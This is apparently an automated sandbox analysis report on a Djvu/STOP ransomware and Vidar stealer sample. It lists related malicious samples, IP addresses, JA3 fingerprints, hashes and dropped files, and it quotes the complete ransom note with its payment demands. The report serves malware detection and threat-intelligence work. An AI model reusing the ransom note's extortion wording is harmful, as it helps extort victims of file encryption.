                                                                                                          8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                          • 172.67.139.220

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          HETZNER-ASDEZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                          • 95.217.244.99
                                                                                                          LGDACOMLGDACOMCorporationKRZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 211.181.24.133
                                                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                          • 123.140.161.243
                                                                                                          3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                          • 211.181.24.132
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 211.181.24.132
                                                                                                          oVOImRIAaz.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 211.168.166.45
                                                                                                          1mHUcsxKG6.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 123.143.169.235
                                                                                                          wMPum9KAnI.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 61.248.201.89
                                                                                                          xzk9TKqNoI.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 118.131.165.73
                                                                                                          SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                                                                          • 112.222.118.250
                                                                                                          BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 106.244.173.151
                                                                                                          UninetSAdeCVMXZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.163.142.13
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.232.19.193
                                                                                                          957C4XK6Lt.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 189.190.10.16
                                                                                                          UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.245.19.217
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.232.19.193
                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 187.228.55.117
                                                                                                          oVOImRIAaz.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 201.129.243.137
                                                                                                          xzk9TKqNoI.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 148.227.200.233
                                                                                                          sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 201.155.131.147
                                                                                                          sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 189.181.178.47
                                                                                                          CLOUDFLARENETUShttps://0_kid43983.inibara.eu/Get hashmaliciousUnknownBrowse
                                                                                                          • 104.21.34.12
                                                                                                          http://ustteam.com/Get hashmaliciousUnknownBrowse
                                                                                                          • 104.18.142.119
                                                                                                          https://2h.ae/HWtBGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.205.158
                                                                                                          https://www.clinical-partners.co.ukGet hashmaliciousUnknownBrowse
                                                                                                          • 172.65.208.22
                                                                                                          http://www.gerstacker-weinkellerei.deGet hashmaliciousUnknownBrowse
                                                                                                          • 1.1.1.1
                                                                                                          http://www.clinical-partners.co.ukGet hashmaliciousUnknownBrowse
                                                                                                          • 172.65.208.22
                                                                                                          107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                          • 172.67.191.112
                                                                                                          https://bafybeialjrwo2ct3n2glolpm3zfawtv73xej3opbbgjsfewkonoew4x5xe.ipfs.cf-ipfs.com/?sourceId=ukcompanyformations@vistra.comGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.64.14
                                                                                                          https://cfinlaysons-website.mypagecloud.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 172.67.69.65
                                                                                                          https://i.imgur.com/EoTj4iI.pngGet hashmaliciousUnknownBrowse
                                                                                                          • 172.64.151.101

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          51c64c77e60f3980eea90869b68c58a8Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                          • 95.217.9.149
                                                                                                          37f463bf4616ecd445d4a1937da06e19107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84
                                                                                                          rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.21.65.24
                                                                                                          • 23.65.44.84

                                                                                                          Dropped Files

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sqln[1].dllZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                            SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                              file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                  8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                                    UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                      mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                        JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exe8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                                                3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                  AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                    8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\$WinREAgent\Scratch\_README.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1381
                                                                                                                                      Entropy (8bit):4.871279842231698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw3P:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/ko
                                                                                                                                      MD5:5C0D2AF2BAB961C34BE63223AFBBE8AE
                                                                                                                                      SHA1:FF8D0B48F001D5BDF4750B3FC165BB35901ABA39
                                                                                                                                      SHA-256:C20FC1B29B3E90E6FDD470F188EA5B1F9BE3ABE2DD7182A446104BEED5B0F765
                                                                                                                                      SHA-512:3868A57A61249B2FD243F7C526ED976F8D7730DD49970809BCCAA9FA686C533F9348C7240146F8F17BA7319F99C41D19165B5DE25A94976879122144BD450729
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                      C:\$WinREAgent\_README.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1381
                                                                                                                                      Entropy (8bit):4.871279842231698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw3P:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/ko
                                                                                                                                      MD5:5C0D2AF2BAB961C34BE63223AFBBE8AE
                                                                                                                                      SHA1:FF8D0B48F001D5BDF4750B3FC165BB35901ABA39
                                                                                                                                      SHA-256:C20FC1B29B3E90E6FDD470F188EA5B1F9BE3ABE2DD7182A446104BEED5B0F765
                                                                                                                                      SHA-512:3868A57A61249B2FD243F7C526ED976F8D7730DD49970809BCCAA9FA686C533F9348C7240146F8F17BA7319F99C41D19165B5DE25A94976879122144BD450729
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                      C:\ProgramData\BGHJEBKJEGHJKECAAKJK

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40960
                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\ProgramData\IJEHCGIJ

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):159744
                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\ProgramData\KECFCGHIDHCAKEBFCFHCBFBKKE

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20480
                                                                                                                                      Entropy (8bit):0.848598812124929
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                      MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                      SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                      SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                      SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\SystemID\PersonalID.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):42
                                                                                                                                      Entropy (8bit):4.737322779818596
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:xUb4QGWnAov:43X
                                                                                                                                      MD5:0A0B65EFD0403D8049E8BC13A5A92B58
                                                                                                                                      SHA1:39B75647C1858C3EB4201BB49F6A25D81EBC6326
                                                                                                                                      SHA-256:D3A6217B5322D48720668DF2A4F9C3E958971806D178AACC233153376A290D12
                                                                                                                                      SHA-512:EC645F2859F490DBE7D380B34E508F9B905F9414AF3056FCCEBC2B3D73E3E959E47D1BB0BE5B67F9D7400CAFD3AF94E02C1303E2F233E406F7804786277028FD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT..

                                                                                                                                      C:\Users\user\.curlrc

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):342
                                                                                                                                      Entropy (8bit):7.235355475644898
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:KW3UHih87ovFPlNLem2uLWLKMWcfLP+KzqMYr1Ub6uABNBxS33ukIcii96Z:N3Fo4FtNLemJyLKMWcfLP+OqZrW+u2xr
                                                                                                                                      MD5:F7504346A204CF1D7124FA86029F8156
                                                                                                                                      SHA1:353D445E8AB6FFD7CFD70D5A987EDC59FAC17BF3
                                                                                                                                      SHA-256:F01C3CE3B379F62E0E65CE4042D42C21CDDD36D418654A8A202A1330209BB84E
                                                                                                                                      SHA-512:4F747F071E6DEA82FBA3E0232E65A964A2C9FE8AEB2205EDEC76FABF4562DA6B1A31D0B1598AF356490FD285CB7226F813C0F134B330D59415D635234338C9B5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:insec#..U=.....}.....&.+...."P.[l.M..X._.H7.D9=8...?..n(.l.....'[..w+.\r..z....lD..0...R'.Z6.ni.C..|...$6.....r..qV..g#..=i*..8.H....l..i............4..3/j+...<..>..dr.W.Oe.@....tPZ..V...P...<........O....S,D...N..}..2.p..Z....[....6....*d(......@.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\.curlrc.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):342
                                                                                                                                      Entropy (8bit):7.235355475644898
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:KW3UHih87ovFPlNLem2uLWLKMWcfLP+KzqMYr1Ub6uABNBxS33ukIcii96Z:N3Fo4FtNLemJyLKMWcfLP+OqZrW+u2xr
                                                                                                                                      MD5:F7504346A204CF1D7124FA86029F8156
                                                                                                                                      SHA1:353D445E8AB6FFD7CFD70D5A987EDC59FAC17BF3
                                                                                                                                      SHA-256:F01C3CE3B379F62E0E65CE4042D42C21CDDD36D418654A8A202A1330209BB84E
                                                                                                                                      SHA-512:4F747F071E6DEA82FBA3E0232E65A964A2C9FE8AEB2205EDEC76FABF4562DA6B1A31D0B1598AF356490FD285CB7226F813C0F134B330D59415D635234338C9B5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:insec#..U=.....}.....&.+...."P.[l.M..X._.H7.D9=8...?..n(.l.....'[..w+.\r..z....lD..0...R'.Z6.ni.C..|...$6.....r..qV..g#..=i*..8.H....l..i............4..3/j+...<..>..dr.W.Oe.@....tPZ..V...P...<........O....S,D...N..}..2.p..Z....[....6....*d(......@.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):631
                                                                                                                                      Entropy (8bit):7.592299281719031
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:kDmATeUyJU93XC3HpurC6UG79EXL7oqAHgFD3lOiGgwMPNeukIcii9a:edT593MgTjEf2HYk3gn5bD
                                                                                                                                      MD5:DC658A398ED7FE3C89E5BE6424423C9C
                                                                                                                                      SHA1:324FD9FF32D89D6A8E6FA049F89067FE1798DEBF
                                                                                                                                      SHA-256:C57B27C9C23532EC3701A1527B34A9731E91E37993BFB305BEEEC5CCE500EB62
                                                                                                                                      SHA-512:6AF65AEF6ADC5250AF62FADE53A64273A5E524F28662F3F0C7161BE3EED4DA315BECF63D662644717BC6DF933CCA3CBF71489BC95DCAE9B85E868A8D71C8189B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2023/."...FU#w..j.,.0%..i{...M.z.M.K.Wm.9.....V.p..Tb.!.s........W..m...C.......R+..f...H].|......8{...4~|...7*.....fC]..r.!.....O.u.7 (I..v0.[S.t=.......f...Z..AsA....]FG.........)...(....c... 0..n..=.fV.k..&.4.....v.B.B..d....-[.d.}.F.s....K.p.=...)I..1.jf..V..).j..#6....].....K..U.>...p..=.+4............._t.O!.d._....Q..T...h.B.=;G-W?3"...R..A.I....b.of...z..C.. ..H.hX..r8.4.[...._).M^..Pf..H..i.n...))..../...S.............. 3....I..~./...w-i......^f...sJ......k"zR..r..!".Z."d.FD9S...".F..l.`M7.y$v...b.n....,.@.Z..$Ctp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):631
                                                                                                                                      Entropy (8bit):7.592299281719031
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:kDmATeUyJU93XC3HpurC6UG79EXL7oqAHgFD3lOiGgwMPNeukIcii9a:edT593MgTjEf2HYk3gn5bD
                                                                                                                                      MD5:DC658A398ED7FE3C89E5BE6424423C9C
                                                                                                                                      SHA1:324FD9FF32D89D6A8E6FA049F89067FE1798DEBF
                                                                                                                                      SHA-256:C57B27C9C23532EC3701A1527B34A9731E91E37993BFB305BEEEC5CCE500EB62
                                                                                                                                      SHA-512:6AF65AEF6ADC5250AF62FADE53A64273A5E524F28662F3F0C7161BE3EED4DA315BECF63D662644717BC6DF933CCA3CBF71489BC95DCAE9B85E868A8D71C8189B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2023/."...FU#w..j.,.0%..i{...M.z.M.K.Wm.9.....V.p..Tb.!.s........W..m...C.......R+..f...H].|......8{...4~|...7*.....fC]..r.!.....O.u.7 (I..v0.[S.t=.......f...Z..AsA....]FG.........)...(....c... 0..n..=.fV.k..&.4.....v.B.B..d....-[.d.}.F.s....K.p.=...)I..1.jf..V..).j..#6....].....K..U.>...p..=.+4............._t.O!.d._....Q..T...h.B.=;G-W?3"...R..A.I....b.of...z..C.. ..H.hX..r8.4.[...._).M^..Pf..H..i.n...))..../...S.............. 3....I..~./...w-i......^f...sJ......k"zR..r..!".Z."d.FD9S...".F..l.`M7.y$v...b.n....,.@.Z..$Ctp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):678
                                                                                                                                      Entropy (8bit):7.66517283648626
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:khRvQTywnOalILaQZxYpwjx0Se+7upzDqjMa5ukIcii9a:MvGZRIWQZxYSjx0hzDznbD
                                                                                                                                      MD5:56B17C5708840C1CA71751E8F5B56012
                                                                                                                                      SHA1:D1E016A22C5E4B0EEC2FF997FF552EABB36DE8EA
                                                                                                                                      SHA-256:B058E8393D7D03FC4C3EED0CC764A50C0CA70A2ADA47DB8C3BB79697068009C2
                                                                                                                                      SHA-512:911350B6C2063E9BBA0B0B153530B4FAF38118F577F880C3BAD02ECD3C08DFE15CF10EBFD8DE4D66C3D0B60BA4BE94CB69F393681284020814EB8A654D5A493C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2023/....|..r..&~.5n.k)...a.Q.....;.;.x.......&......5.V.m.@2.%..n..JO.z...^...~.h!.i..=../j....O.z..6.s......Uq.80:su\.n..,.a.DF.4.%S...=.pu.]&ce.N...:...w...7LXm..*9..B.+.d!.;..L..}....k.F.cxd.9.Em-Y9.x.....l..*.;.......c..)o......v....|.#q]q....&...j.I....+........\..r.[.0.....~...gd.....l.uZh.yd.....@E<'.*...... ..d.B....~.v.Y.S`%........b.D.a..y|.5.z.C..E2|.z).Z....\......R8~W`..D.C.a.6mj.qK.5d~.r..aw._....y..5.]..]o........z ...g.R....r..C..g;E...X.. `$.Y..I.6.u..pf..8.....t..MD...Ba..P....1G4......Z.........U...l{..r,.>3.v.......+.OHb..o.*.....q.n ..%g.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):678
                                                                                                                                      Entropy (8bit):7.66517283648626
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:khRvQTywnOalILaQZxYpwjx0Se+7upzDqjMa5ukIcii9a:MvGZRIWQZxYSjx0hzDznbD
                                                                                                                                      MD5:56B17C5708840C1CA71751E8F5B56012
                                                                                                                                      SHA1:D1E016A22C5E4B0EEC2FF997FF552EABB36DE8EA
                                                                                                                                      SHA-256:B058E8393D7D03FC4C3EED0CC764A50C0CA70A2ADA47DB8C3BB79697068009C2
